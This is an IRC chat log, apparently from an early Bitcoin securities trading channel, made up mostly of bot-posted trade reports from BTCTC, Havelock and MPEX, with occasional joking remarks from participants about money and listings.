Aug 13 00:19:02 [BTCTC] [DMS.MINING] 230 @ 0.0035 = 0.805 BTC [-] Aug 13 00:19:10 [BTCTC] [DMS.MINING] 200 @ 0.0035 = 0.7 BTC [-] Aug 13 00:19:29 [BTCTC] [LABCOIN] 30 @ 0.001721 = 0.0516 BTC [-] Aug 13 00:19:32 [BTCTC] [LABCOIN] 20 @ 0.00172 = 0.0344 BTC [-] Aug 13 00:20:24 [BTCTC] [DMS.PURCHASE] 100 @ 0.02801 = 2.801 BTC [-] Aug 13 00:20:34 [HAVELOCK] [AM100] 20 @ 0.0386 = 0.772 BTC [-] Aug 13 00:20:34 So, btct.co rejected listing Icedril so far? Am I reading that correctly 1/4? Aug 13 00:20:43 [BTCTC] [DMS.MINING] 1 @ 0.0035 BTC [-] Aug 13 00:20:45 [BTCTC] [DMS.MINING] 60 @ 0.0035 = 0.21 BTC [-] Aug 13 00:21:01 [BTCTC] [DMS.SELLING] 60 @ 0.025 = 1.5 BTC [-] Aug 13 00:21:11 [BTCTC] [DMS.PURCHASE] 60 @ 0.02801 = 1.6806 BTC [-] Aug 13 00:21:12 [BTCTC] [DMS.SELLING] 229 @ 0.025 = 5.725 BTC [-] Aug 13 00:21:43 [BTCTC] [DMS.PURCHASE] 230 @ 0.02801 = 6.4423 BTC [-] Aug 13 00:22:16 [BTCTC] [LABCOIN] 30 @ 0.001717 = 0.0515 BTC [-] Aug 13 00:22:24 [BTCTC] [LABCOIN] 1 @ 0.001717 BTC [-] Aug 13 00:22:38 [BTCTC] [DMS.PURCHASE] 10 @ 0.02801 = 0.2801 BTC [-] Aug 13 00:22:41 [BTCTC] [DMS.MINING] 60 @ 0.0035 = 0.21 BTC [-] Aug 13 00:22:48 [BTCTC] [LABCOIN] 16 @ 0.001719 = 0.0275 BTC [+] Aug 13 00:22:49 [BTCTC] [DMS.SELLING] 60 @ 0.025 = 1.5 BTC [-] Aug 13 00:22:50 [BTCTC] [LABCOIN] 270 @ 0.00172 = 0.4644 BTC [+] Aug 13 00:22:52 [BTCTC] [DMS.PURCHASE] 60 @ 0.02801 = 1.6806 BTC [-] Aug 13 00:23:10 50million shares? Aug 13 00:24:15 [BTCTC] [DMS.PURCHASE] 750 @ 0.02801 = 21.0075 BTC [-] Aug 13 00:24:29 [BTCTC] [DMS.SELLING] 100 @ 0.025 = 2.5 BTC [-] Aug 13 00:24:45 [BTCTC] [LABCOIN] 30 @ 0.001749 = 0.0525 BTC [+] Aug 13 00:24:47 [BTCTC] [LABCOIN] 470 @ 0.001749 = 0.822 BTC [+] Aug 13 00:24:49 [BTCTC] [DMS.SELLING] 230 @ 0.025 = 5.75 BTC [-] Aug 13 00:25:03 [BTCTC] [DMS.MINING] 9 @ 0.003501 = 0.0315 BTC [+] Aug 13 00:25:13 [BTCTC] [DMS.MINING] 9 @ 0.0035 = 0.0315 BTC [-] Aug 13 00:25:15 [BTCTC] [DMS.MINING] 230 @ 0.0035 = 0.805 BTC [-] Aug 13 00:25:17 [BTCTC] [DMS.SELLING] 9 @ 0.025 = 0.225 BTC [-] Aug 13 00:25:19 [BTCTC] [DMS.PURCHASE] 9 @ 0.02801 = 0.2521 BTC [-] Aug 13 00:25:31 I am not sure, tranche 1 sold err did something on bitfunder, and now there is a listing locked on btct.co Aug 13 00:25:39 [BTCTC] [DMS.PURCHASE] 235 @ 0.02801 = 6.5824 BTC [-] Aug 13 00:25:49 [BTCTC] [DMS.MINING] 91 @ 0.0035 = 0.3185 BTC [-] Aug 13 00:26:07 [BTCTC] [DMS.MINING] 61 @ 0.0035 = 0.2135 BTC [-] Aug 13 00:26:15 [BTCTC] [DMS.SELLING] 61 @ 0.025 = 1.525 BTC [-] Aug 13 00:26:17 [BTCTC] [DMS.PURCHASE] 61 @ 0.02801 = 1.7086 BTC [-] Aug 13 00:27:08 [BTCTC] [DMS.MINING] 9 @ 0.0035 = 0.0315 BTC [-] Aug 13 00:27:17 [BTCTC] [DMS.SELLING] 9 @ 0.025 = 0.225 BTC [-] Aug 13 00:27:29 [BTCTC] [DMS.PURCHASE] 9 @ 0.02801 = 0.2521 BTC [-] Aug 13 00:27:44 [BTCTC] [DMS.SELLING] 235 @ 0.025 = 5.875 BTC [-] Aug 13 00:27:47 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [-] Aug 13 00:27:57 [BTCTC] [DMS.MINING] 235 @ 0.0035 = 0.8225 BTC [-] Aug 13 00:28:08 [BTCTC] [LABCOIN] 30 @ 0.001744 = 0.0523 BTC [-] Aug 13 00:28:09 [BTCTC] [LABCOIN] 27 @ 0.001745 = 0.0471 BTC [+] Aug 13 00:28:10 [BTCTC] [LABCOIN] 1 @ 0.001747 BTC [+] Aug 13 00:28:11 [BTCTC] [LABCOIN] 20 @ 0.001748 = 0.035 BTC [+] Aug 13 00:28:12 [BTCTC] [LABCOIN] 200 @ 0.001774 = 0.3548 BTC [+] Aug 13 00:28:13 [BTCTC] [LABCOIN] 520 @ 0.001775 = 0.923 BTC [+] Aug 13 00:28:31 [BTCTC] [DMS.MINING] 18 @ 0.0035 = 0.063 BTC [-] Aug 13 00:28:42 [BTCTC] [LABCOIN] 1 @ 0.001743 BTC [-] Aug 13 00:28:43 [BTCTC] [DMS.SELLING] 18 @ 0.025 = 0.45 BTC [-] Aug 13 00:28:44 [BTCTC] [LABCOIN] 103 @ 0.001773 = 0.1826 BTC [+] Aug 13 00:28:45 [BTCTC] [LABCOIN] 97 @ 0.001775 = 0.1722 BTC [+] Aug 13 00:28:50 [HAVELOCK] [AM100] 4 @ 0.0387 = 0.1548 BTC [+] Aug 13 00:28:53 [BTCTC] [DMS.PURCHASE] 18 @ 0.02801 = 0.5042 BTC [-] Aug 13 00:28:54 [BTCTC] [DMS.PURCHASE] 238 @ 0.02801 = 6.6664 BTC [-] Aug 13 00:29:04 [BTCTC] [DMS.MINING] 25 @ 0.003415 = 0.0854 BTC [-] Aug 13 00:29:22 [BTCTC] [LABCOIN] 30 @ 0.001774 = 0.0532 BTC [-] Aug 13 00:29:45 [BTCTC] [DMS.SELLING] 52 @ 0.025 = 1.3 BTC [-] Aug 13 00:29:47 [BTCTC] [DMS.PURCHASE] 52 @ 0.02801 = 1.4565 BTC [-] Aug 13 00:29:57 [BTCTC] [DMS.MINING] 750 @ 0.003415 = 2.5613 BTC [-] Aug 13 00:30:10 [BTCTC] [LABCOIN] 9 @ 0.001774 = 0.016 BTC [-] Aug 13 00:30:22 [BTCTC] [DMS.SELLING] 370 @ 0.025 = 9.25 BTC [-] Aug 13 00:30:43 [BTCTC] [DMS.MINING] 18 @ 0.003416 = 0.0615 BTC [+] Aug 13 00:30:43 [BTCTC] [DMS.MINING] 34 @ 0.003415 = 0.1161 BTC [-] Aug 13 00:30:55 [BTCTC] [DMS.PURCHASE] 18 @ 0.02801 = 0.5042 BTC [-] Aug 13 00:31:14 [BTCTC] [DMS.MINING] 238 @ 0.003415 = 0.8128 BTC [-] Aug 13 00:33:41 [HAVELOCK] [HIM] 1 @ 0.149 BTC [+] Aug 13 00:35:32 [BTCTC] [ACTIVEMINING] 30 @ 0.005719 = 0.1716 BTC [+] Aug 13 00:35:50 [HAVELOCK] [HIM] 1 @ 0.1495 BTC [+] Aug 13 00:36:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005865 = 0.176 BTC [+] Aug 13 00:37:18 [BTCTC] [COGNITIVE] 1 @ 0.4349 BTC [+] Aug 13 00:37:29 [BTCTC] [ACTIVEMINING] 220 @ 0.005865 = 1.2903 BTC [+] Aug 13 00:37:34 [BTCTC] [ACTIVEMINING] 150 @ 0.005865 = 0.8798 BTC [+] Aug 13 00:40:52 [HAVELOCK] [LABCO] 43 @ 0.0015777 = 0.0678 BTC [+] Aug 13 00:44:27 went quiet Aug 13 00:44:39 where the money at? Aug 13 00:45:01 [HAVELOCK] [LABCO] 17 @ 0.0015777 = 0.0268 BTC [+] Aug 13 00:45:31 [MPEX] [S.MPOE] 8050 @ 0.00084838 = 6.8295 BTC [-] Aug 13 00:46:38 hello sir. Aug 13 00:46:47 we here at house of assets no money. no money at all. Aug 13 00:48:30 [HAVELOCK] [CFIG] 100 @ 0.15 = 15 BTC Aug 13 00:50:19 [HAVELOCK] [CFIG] 7 @ 0.15 = 1.05 BTC Aug 13 00:50:32 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 13 00:50:51 don't be silly Aug 13 00:50:57 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.001499 = 0.006 BTC [+] Aug 13 00:51:08 nothing but endless rivers of money all around us Aug 13 00:51:53 giant lakes full of liquid gold Aug 13 00:52:36 crispy green dollar bills growing on trees Aug 13 00:52:48 such are the wonders of bitcoinland Aug 13 00:53:18 and innumerable flocks of sheep Aug 13 00:53:31 lo Aug 13 00:54:44 [BTCTC] [TAT.MINIGAME] 23 @ 0.000237 = 0.0055 BTC [+] Aug 13 00:55:45 i eat dollars for breakfast Aug 13 00:56:17 [BTCTC] [LABCOIN] 2 @ 0.001747 = 0.0035 BTC [-] Aug 13 00:56:36 [HAVELOCK] [XBOND] 55 @ 0.00104698 = 0.0576 BTC [-] Aug 13 00:56:37 i prefer goat milk Aug 13 00:56:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.04168 BTC [-] Aug 13 00:57:19 [HAVELOCK] [SMG] 35 @ 0.000208 = 0.0073 BTC [+] Aug 13 00:57:39 c'mon where are my 32K btc Aug 13 00:57:42 [HAVELOCK] [XBOND] 75 @ 0.00104699 = 0.0785 BTC [+] Aug 13 00:58:05 gecko_x2 it's coming in 0.0x increments. Aug 13 00:58:10 should be a few months, hold tight Aug 13 00:58:16 [BTCTC] [LABCOIN] 2 @ 0.001747 = 0.0035 BTC [-] Aug 13 00:58:17 [BTCTC] [LABCOIN] 20 @ 0.001729 = 0.0346 BTC [-] Aug 13 00:58:19 [BTCTC] [LABCOIN] 69 @ 0.001717 = 0.1185 BTC [-] Aug 13 00:59:20 that's not enough Aug 13 01:00:28 [BTCTC] [PAJKA.BOND] 1 @ 0.01579 BTC [+] Aug 13 01:00:53 [HAVELOCK] [HIM] 37 @ 0.149 = 5.513 BTC [-] Aug 13 01:01:55 [HAVELOCK] [AM100] 20 @ 0.0387 = 0.774 BTC [+] Aug 13 01:01:58 [HAVELOCK] [AM1] 1 @ 4.03898 BTC [+] Aug 13 01:02:16 [HAVELOCK] [AM100] 4 @ 0.0387 = 0.1548 BTC [+] Aug 13 01:04:33 [MPEX] [S.MPOE] 6600 @ 0.00085078 = 5.6151 BTC [+] Aug 13 01:06:50 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1951 = 0.3902 BTC [-] Aug 13 01:06:50 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1951 BTC [-] Aug 13 01:07:27 [HAVELOCK] [AM100] 4 @ 0.0370001 = 0.148 BTC [-] Aug 13 01:07:28 [HAVELOCK] [AM100] 5 @ 0.0369 = 0.1845 BTC [-] Aug 13 01:07:31 [HAVELOCK] [AM100] 1 @ 0.03682 BTC [-] Aug 13 01:10:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.04168 = 0.1667 BTC [-] Aug 13 01:11:44 [BTCTC] [NASTY-PT] 9 @ 0.0045 = 0.0405 BTC [+] Aug 13 01:12:20 [BTCTC] [NASTY-PT] 14 @ 0.0045 = 0.063 BTC [+] Aug 13 01:13:45 [BTCTC] [CB.IDIFF-O] 50 @ 0.0095 = 0.475 BTC [+] Aug 13 01:13:55 [HAVELOCK] [AM100] 4 @ 0.0387 = 0.1548 BTC [+] Aug 13 01:14:11 [BTCTC] [LABCOIN] 9 @ 0.001739 = 0.0157 BTC [+] Aug 13 01:14:37 [HAVELOCK] [LABCO] 3 @ 0.0015777 = 0.0047 BTC [+] Aug 13 01:15:57 [BTCTC] [BASIC-MINING] 1 @ 0.302 BTC [-] Aug 13 01:16:48 [HAVELOCK] [AM1] 1 @ 4.03899 BTC [+] Aug 13 01:16:54 [HAVELOCK] [AM1] 1 @ 4.05 BTC [+] Aug 13 01:18:46 [BTCTC] [PAJKA.BOND] 3 @ 0.01579 = 0.0474 BTC [+] Aug 13 01:20:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.04168 = 0.0834 BTC [-] Aug 13 01:20:22 [BTCTC] [LABCOIN] 4 @ 0.001728 = 0.0069 BTC [-] Aug 13 01:20:23 [BTCTC] [LABCOIN] 30 @ 0.001729 = 0.0519 BTC [+] Aug 13 01:20:24 [BTCTC] [LABCOIN] 13 @ 0.00173 = 0.0225 BTC [+] Aug 13 01:20:26 [BTCTC] [LABCOIN] 2 @ 0.001735 = 0.0035 BTC [+] Aug 13 01:20:27 [BTCTC] [LABCOIN] 20 @ 0.001736 = 0.0347 BTC [+] Aug 13 01:20:28 [BTCTC] [LABCOIN] 12 @ 0.001739 = 0.0209 BTC [+] Aug 13 01:20:29 [BTCTC] [LABCOIN] 103 @ 0.00174 = 0.1792 BTC [+] Aug 13 01:20:30 [BTCTC] [LABCOIN] 50 @ 0.001746 = 0.0873 BTC [+] Aug 13 01:20:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.04168 = 0.4168 BTC [-] Aug 13 01:20:56 [BTCTC] [PAJKA.BOND] 1 @ 0.0158 BTC [+] Aug 13 01:20:59 [BTCTC] [LTC-ATF.B2] 8 @ 0.01043 = 0.0834 BTC [+] Aug 13 01:21:06 [BTCTC] [ASICMINER-PT] 1 @ 4.236 BTC [+] Aug 13 01:21:31 [BTCTC] [ACTIVEMINING] 11 @ 0.005855 = 0.0644 BTC [-] Aug 13 01:21:51 [BTCTC] [LABCOIN] 30 @ 0.001727 = 0.0518 BTC [-] Aug 13 01:21:52 [BTCTC] [LABCOIN] 20 @ 0.001728 = 0.0346 BTC [+] Aug 13 01:22:26 [BTCTC] [DMS.MINING] 8 @ 0.003749 = 0.03 BTC [+] Aug 13 01:24:20 [BTCTC] [LABCOIN] 2 @ 0.001744 = 0.0035 BTC [+] Aug 13 01:25:51 [BTCTC] [TAT.ASICMINER] 20 @ 0.04168 = 0.8336 BTC [-] Aug 13 01:25:53 [BTCTC] [TAT.ASICMINER] 50 @ 0.04168 = 2.084 BTC [-] Aug 13 01:25:53 [BTCTC] [TAT.ASICMINER] 75 @ 0.04169 = 3.1268 BTC [+] Aug 13 01:25:54 [BTCTC] [TAT.ASICMINER] 26 @ 0.04175 = 1.0855 BTC [+] Aug 13 01:26:22 [BTCTC] [BASIC-MINING] 1 @ 0.3027 BTC [+] Aug 13 01:27:25 is it quiet because people are werking or quiet because people are waiting? Aug 13 01:39:17 [BTCTC] [DMS.SELLING] 7 @ 0.02525 = 0.1768 BTC [+] Aug 13 01:39:39 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Aug 13 01:40:16 [BTCTC] [ACTIVEMINING] 1 @ 0.005845 BTC [-] Aug 13 01:40:24 [BTCTC] [LABCOIN] 6 @ 0.001744 = 0.0105 BTC [+] Aug 13 01:41:18 [BTCTC] [LABCOIN] 6 @ 0.001742 = 0.0105 BTC [-] Aug 13 01:41:19 [BTCTC] [LABCOIN] 24 @ 0.001743 = 0.0418 BTC [+] Aug 13 01:42:20 [BTCTC] [LABCOIN] 29 @ 0.001742 = 0.0505 BTC [-] Aug 13 01:42:21 [BTCTC] [LABCOIN] 235 @ 0.001743 = 0.4096 BTC [+] Aug 13 01:42:55 [BTCTC] [LABCOIN] 556 @ 0.001743 = 0.9691 BTC [+] Aug 13 01:43:06 [BTCTC] [LABCOIN] 20 @ 0.001708 = 0.0342 BTC [-] Aug 13 01:43:07 [BTCTC] [LABCOIN] 235 @ 0.001707 = 0.4011 BTC [-] Aug 13 01:43:08 [BTCTC] [LABCOIN] 25 @ 0.001699 = 0.0425 BTC [-] Aug 13 01:44:40 [HAVELOCK] [AM100] 20 @ 0.0387 = 0.774 BTC [+] Aug 13 01:44:44 [BTCTC] [LABCOIN] 15 @ 0.001745 = 0.0262 BTC [+] Aug 13 01:44:46 [BTCTC] [LABCOIN] 35 @ 0.001746 = 0.0611 BTC [+] Aug 13 01:45:37 [BTCTC] [ASICMINER-PT] 1 @ 4.219 BTC [-] Aug 13 01:45:59 [BTCTC] [ASICMINER-PT] 1 @ 4.219 BTC [-] Aug 13 01:47:40 [BTCTC] [ASICMINER-PT] 2 @ 4.219 = 8.438 BTC [-] Aug 13 01:49:45 https://bitcointalk.org/index.php?topic=271786.msg2920206#msg2920206 loller Aug 13 01:49:50 Title: Translation Romanian -> English. 330 words, 1 BTC. Aug 13 01:49:52 [BTCTC] [LABCOIN] 6 @ 0.001733 = 0.0104 BTC [-] Aug 13 01:49:54 [BTCTC] [LABCOIN] 235 @ 0.001734 = 0.4075 BTC [+] Aug 13 01:49:55 [BTCTC] [LABCOIN] 30 @ 0.001738 = 0.0521 BTC [+] Aug 13 01:49:55 [BTCTC] [LABCOIN] 20 @ 0.001739 = 0.0348 BTC [+] Aug 13 01:49:56 [BTCTC] [LABCOIN] 89 @ 0.001747 = 0.1555 BTC [+] Aug 13 01:49:57 [BTCTC] [LABCOIN] 232 @ 0.001748 = 0.4055 BTC [+] Aug 13 01:51:09 [BTCTC] [TAT.ASICMINER] 37 @ 0.04095 = 1.5152 BTC [-] Aug 13 01:51:10 [BTCTC] [TAT.ASICMINER] 50 @ 0.04093 = 2.0465 BTC [-] Aug 13 01:51:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.0409 = 0.0818 BTC [-] Aug 13 01:51:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.0408 = 0.0816 BTC [-] Aug 13 01:51:14 [BTCTC] [TAT.ASICMINER] 5 @ 0.04068 = 0.2034 BTC [-] Aug 13 01:51:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.0406 = 0.0812 BTC [-] Aug 13 01:51:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.04051 = 0.162 BTC [-] Aug 13 01:51:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.0405 = 0.2025 BTC [-] Aug 13 01:51:17 [BTCTC] [TAT.ASICMINER] 19 @ 0.0405 = 0.7695 BTC [-] Aug 13 01:51:19 [BTCTC] [LABCOIN] 30 @ 0.001695 = 0.0509 BTC [-] Aug 13 01:51:20 [BTCTC] [LABCOIN] 205 @ 0.001694 = 0.3473 BTC [-] Aug 13 01:52:05 [BTCTC] [LABCOIN] 33 @ 0.001694 = 0.0559 BTC [-] Aug 13 01:52:07 [BTCTC] [LABCOIN] 108 @ 0.001693 = 0.1828 BTC [-] Aug 13 01:52:16 [BTCTC] [ACTIVEMINING] 50 @ 0.0058 = 0.29 BTC [-] Aug 13 01:53:53 [BTCTC] [ACTIVEMINING] 30 @ 0.005734 = 0.172 BTC [-] Aug 13 01:53:55 [BTCTC] [ACTIVEMINING] 2 @ 0.005733 = 0.0115 BTC [-] Aug 13 01:53:57 [BTCTC] [ASICMINER-PT] 6 @ 4.219 = 25.314 BTC [-] Aug 13 01:54:17 [BTCTC] [TAT.ASICMINER] 7 @ 0.04014 = 0.281 BTC [-] Aug 13 02:00:20 [BTCTC] [LABCOIN] 16 @ 0.001721 = 0.0275 BTC [+] Aug 13 02:00:22 [BTCTC] [LABCOIN] 17 @ 0.001747 = 0.0297 BTC [+] Aug 13 02:00:22 [BTCTC] [LABCOIN] 212 @ 0.001748 = 0.3706 BTC [+] Aug 13 02:00:23 [BTCTC] [LABCOIN] 3754 @ 0.001749 = 6.5657 BTC [+] Aug 13 02:00:27 [BTCTC] [LABCOIN] 30 @ 0.001749 = 0.0525 BTC [+] Aug 13 02:02:30 [HAVELOCK] [HIM] 30 @ 0.1495 = 4.485 BTC [+] Aug 13 02:03:06 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.001465 = 0.0088 BTC [-] Aug 13 02:04:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00135 BTC [-] Aug 13 02:05:44 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.001301 = 0.0039 BTC [-] Aug 13 02:06:09 [HAVELOCK] [HIM] 10 @ 0.1498 = 1.498 BTC [+] Aug 13 02:07:19 [HAVELOCK] [HIM] 5 @ 0.14999 = 0.75 BTC [+] Aug 13 02:07:30 [HAVELOCK] [HIM] 5 @ 0.14999 = 0.75 BTC [+] Aug 13 02:08:16 [HAVELOCK] [HIM] 15 @ 0.14999 = 2.2499 BTC [+] Aug 13 02:08:48 [BTCTC] [LABCOIN] 250 @ 0.001763 = 0.4408 BTC [+] Aug 13 02:09:48 [BTCTC] [DMS.SELLING] 373 @ 0.02525 = 9.4183 BTC [+] Aug 13 02:09:49 [BTCTC] [DMS.SELLING] 45 @ 0.02539 = 1.1426 BTC [+] Aug 13 02:09:51 [BTCTC] [DMS.SELLING] 125 @ 0.0254 = 3.175 BTC [+] Aug 13 02:10:06 [BTCTC] [DMS.MINING] 88 @ 0.003415 = 0.3005 BTC [-] Aug 13 02:10:08 [BTCTC] [DMS.SELLING] 88 @ 0.0254 = 2.2352 BTC [+] Aug 13 02:10:18 [BTCTC] [DMS.PURCHASE] 97 @ 0.02801 = 2.717 BTC [-] Aug 13 02:10:41 [HAVELOCK] [HIM] 10 @ 0.14999 = 1.4999 BTC [+] Aug 13 02:11:16 [BTCTC] [DMS.PURCHASE] 775 @ 0.02801 = 21.7078 BTC [-] Aug 13 02:12:20 [BTCTC] [DMS.MINING] 97 @ 0.003415 = 0.3313 BTC [-] Aug 13 02:12:22 [BTCTC] [DMS.SELLING] 97 @ 0.0254 = 2.4638 BTC [+] Aug 13 02:12:35 [BTCTC] [DMS.PURCHASE] 99 @ 0.02801 = 2.773 BTC [-] Aug 13 02:13:23 [BTCTC] [LABCOIN] 2 @ 0.001735 = 0.0035 BTC [-] Aug 13 02:13:44 [BTCTC] [DMS.SELLING] 238 @ 0.0254 = 6.0452 BTC [+] Aug 13 02:14:00 [BTCTC] [ASICMINER-PT] 1 @ 4.22 BTC [+] Aug 13 02:14:16 [BTCTC] [DMS.PURCHASE] 280 @ 0.02801 = 7.8428 BTC [-] Aug 13 02:14:35 [BTCTC] [LABCOIN] 241 @ 0.00176 = 0.4242 BTC [+] Aug 13 02:14:38 [BTCTC] [DMS.MINING] 99 @ 0.003415 = 0.3381 BTC [-] Aug 13 02:14:40 [BTCTC] [DMS.SELLING] 99 @ 0.0254 = 2.5146 BTC [+] Aug 13 02:14:50 [BTCTC] [DMS.PURCHASE] 101 @ 0.02801 = 2.829 BTC [-] Aug 13 02:15:32 [BTCTC] [LABCOIN] 1 @ 0.001764 BTC [+] Aug 13 02:15:32 [BTCTC] [LABCOIN] 30 @ 0.001771 = 0.0531 BTC [+] Aug 13 02:15:33 [BTCTC] [LABCOIN] 31 @ 0.001775 = 0.055 BTC [+] Aug 13 02:15:35 [BTCTC] [LABCOIN] 80 @ 0.001777 = 0.1422 BTC [+] Aug 13 02:15:36 [BTCTC] [LABCOIN] 40 @ 0.001788 = 0.0715 BTC [+] Aug 13 02:15:37 [BTCTC] [LABCOIN] 20 @ 0.001796 = 0.0359 BTC [+] Aug 13 02:15:38 [BTCTC] [LABCOIN] 100 @ 0.001797 = 0.1797 BTC [+] Aug 13 02:15:39 [BTCTC] [LABCOIN] 300 @ 0.001799 = 0.5397 BTC [+] Aug 13 02:15:40 [BTCTC] [LABCOIN] 25 @ 0.001799 = 0.045 BTC [+] Aug 13 02:15:41 [BTCTC] [LABCOIN] 700 @ 0.001799 = 1.2593 BTC [+] Aug 13 02:15:43 [HAVELOCK] [HIM] 12 @ 0.1699999 = 2.04 BTC [+] Aug 13 02:16:28 [BTCTC] [DMS.SELLING] 435 @ 0.0254 = 11.049 BTC [+] Aug 13 02:16:41 [BTCTC] [DMS.MINING] 669 @ 0.003415 = 2.2846 BTC [-] Aug 13 02:16:42 [BTCTC] [DMS.MINING] 25 @ 0.003415 = 0.0854 BTC [-] Aug 13 02:16:43 [BTCTC] [DMS.MINING] 1 @ 0.003415 BTC [-] Aug 13 02:16:55 [BTCTC] [DMS.MINING] 20 @ 0.003414 = 0.0683 BTC [-] Aug 13 02:17:04 [BTCTC] [DMS.MINING] 80 @ 0.003414 = 0.2731 BTC [-] Aug 13 02:17:05 [BTCTC] [DMS.PURCHASE] 3 @ 0.02801 = 0.084 BTC [-] Aug 13 02:17:48 [BTCTC] [LABCOIN] 1000 @ 0.00178 = 1.78 BTC [-] Aug 13 02:18:00 [BTCTC] [DMS.MINING] 81 @ 0.003414 = 0.2765 BTC [-] Aug 13 02:18:09 [BTCTC] [DMS.PURCHASE] 9 @ 0.02801 = 0.2521 BTC [-] Aug 13 02:18:10 [BTCTC] [DMS.PURCHASE] 500 @ 0.02801 = 14.005 BTC [-] Aug 13 02:18:17 .d Aug 13 02:18:18 37392766.13647 | Next Diff in 152 blocks | Estimated Change: 36.0011% in 0d 16h 9m 56s Aug 13 02:18:23 [BTCTC] [DMS.MINING] 280 @ 0.003414 = 0.9559 BTC [-] Aug 13 02:18:53 [BTCTC] [DMS.MINING] 3 @ 0.003414 = 0.0102 BTC [-] Aug 13 02:19:05 [BTCTC] [DMS.PURCHASE] 1 @ 0.02801 BTC [-] Aug 13 02:19:33 [BTCTC] [LABCOIN] 20 @ 0.001761 = 0.0352 BTC [-] Aug 13 02:19:51 [BTCTC] [TAT.MINIGAME] 100 @ 0.00022 = 0.022 BTC [-] Aug 13 02:19:53 [BTCTC] [TAT.MINIGAME] 2 @ 0.000219 = 0.0004 BTC [-] Aug 13 02:19:54 [BTCTC] [TAT.MINIGAME] 145 @ 0.000216 = 0.0313 BTC [-] Aug 13 02:20:11 [BTCTC] [TAT.MINIGAME] 5 @ 0.0002151 = 0.0011 BTC [-] Aug 13 02:20:32 [HAVELOCK] [LABCO] 15 @ 0.0015777 = 0.0237 BTC [+] Aug 13 02:23:29 [BTCTC] [ACTIVEMINING] 30 @ 0.005797 = 0.1739 BTC [+] Aug 13 02:23:30 [BTCTC] [ACTIVEMINING] 50 @ 0.005798 = 0.2899 BTC [+] Aug 13 02:23:31 [BTCTC] [ACTIVEMINING] 140 @ 0.0058 = 0.812 BTC [+] Aug 13 02:23:54 [HAVELOCK] [HIM] 5 @ 0.1699999 = 0.85 BTC [+] Aug 13 02:25:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.04013 = 0.1204 BTC [-] Aug 13 02:25:27 [BTCTC] [DMS.MINING] 500 @ 0.003414 = 1.707 BTC [-] Aug 13 02:26:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.04013 = 0.1204 BTC [-] Aug 13 02:28:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.04013 = 0.1204 BTC [-] Aug 13 02:28:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.04013 BTC [-] Aug 13 02:28:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0401 BTC [-] Aug 13 02:28:33 [BTCTC] [TAT.ASICMINER] 12 @ 0.04 = 0.48 BTC [-] Aug 13 02:28:34 [BTCTC] [TAT.ASICMINER] 35 @ 0.04 = 1.4 BTC [-] Aug 13 02:28:39 [BTCTC] [ACTIVEMINING] 2 @ 0.005795 = 0.0116 BTC [-] Aug 13 02:29:53 [BTCTC] [ACTIVEMINING] 30 @ 0.005795 = 0.1739 BTC [-] Aug 13 02:29:54 [BTCTC] [ACTIVEMINING] 50 @ 0.005796 = 0.2898 BTC [+] Aug 13 02:29:55 [BTCTC] [ACTIVEMINING] 260 @ 0.0058 = 1.508 BTC [+] Aug 13 02:32:05 [BTCTC] [LABCOIN] 30 @ 0.001713 = 0.0514 BTC [-] Aug 13 02:32:06 [BTCTC] [LABCOIN] 20 @ 0.001712 = 0.0342 BTC [-] Aug 13 02:32:07 [BTCTC] [LABCOIN] 1260 @ 0.00171 = 2.1546 BTC [-] Aug 13 02:32:09 [BTCTC] [B.YABMC] 1 @ 0.00288 BTC [-] Aug 13 02:32:22 [BTCTC] [DMS.PURCHASE] 46 @ 0.02801 = 1.2885 BTC [-] Aug 13 02:34:09 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 13 02:34:11 [BTCTC] [B.YABMC] 119 @ 0.00288 = 0.3427 BTC [-] Aug 13 02:34:13 [BTCTC] [B.YABMC] 423 @ 0.00289 = 1.2225 BTC [+] Aug 13 02:34:24 [BTCTC] [LABCOIN] 30 @ 0.001711 = 0.0513 BTC [+] Aug 13 02:34:25 [BTCTC] [LABCOIN] 50 @ 0.00171 = 0.0855 BTC [-] Aug 13 02:34:27 [BTCTC] [LABCOIN] 2 @ 0.001701 = 0.0034 BTC [-] Aug 13 02:34:28 [BTCTC] [LABCOIN] 20 @ 0.0017 = 0.034 BTC [-] Aug 13 02:34:29 [BTCTC] [LABCOIN] 21 @ 0.001674 = 0.0352 BTC [-] Aug 13 02:34:30 [BTCTC] [LABCOIN] 95 @ 0.001673 = 0.1589 BTC [-] Aug 13 02:34:31 [BTCTC] [LABCOIN] 80 @ 0.001672 = 0.1338 BTC [-] Aug 13 02:34:32 [BTCTC] [LABCOIN] 23 @ 0.001662 = 0.0382 BTC [-] Aug 13 02:34:34 [BTCTC] [LABCOIN] 37 @ 0.001661 = 0.0615 BTC [-] Aug 13 02:34:35 [BTCTC] [LABCOIN] 50 @ 0.001661 = 0.0831 BTC [-] Aug 13 02:34:35 [BTCTC] [LABCOIN] 100 @ 0.00166 = 0.166 BTC [-] Aug 13 02:34:36 [BTCTC] [LABCOIN] 208 @ 0.001644 = 0.342 BTC [-] Aug 13 02:34:44 [BTCTC] [LABCOIN] 30 @ 0.001643 = 0.0493 BTC [-] Aug 13 02:35:46 [MPEX] [S.MPOE] 7231 @ 0.00085078 = 6.152 BTC [+] Aug 13 02:36:46 [BTCTC] [NASTY-PT] 5 @ 0.0045 = 0.0225 BTC [+] Aug 13 02:37:49 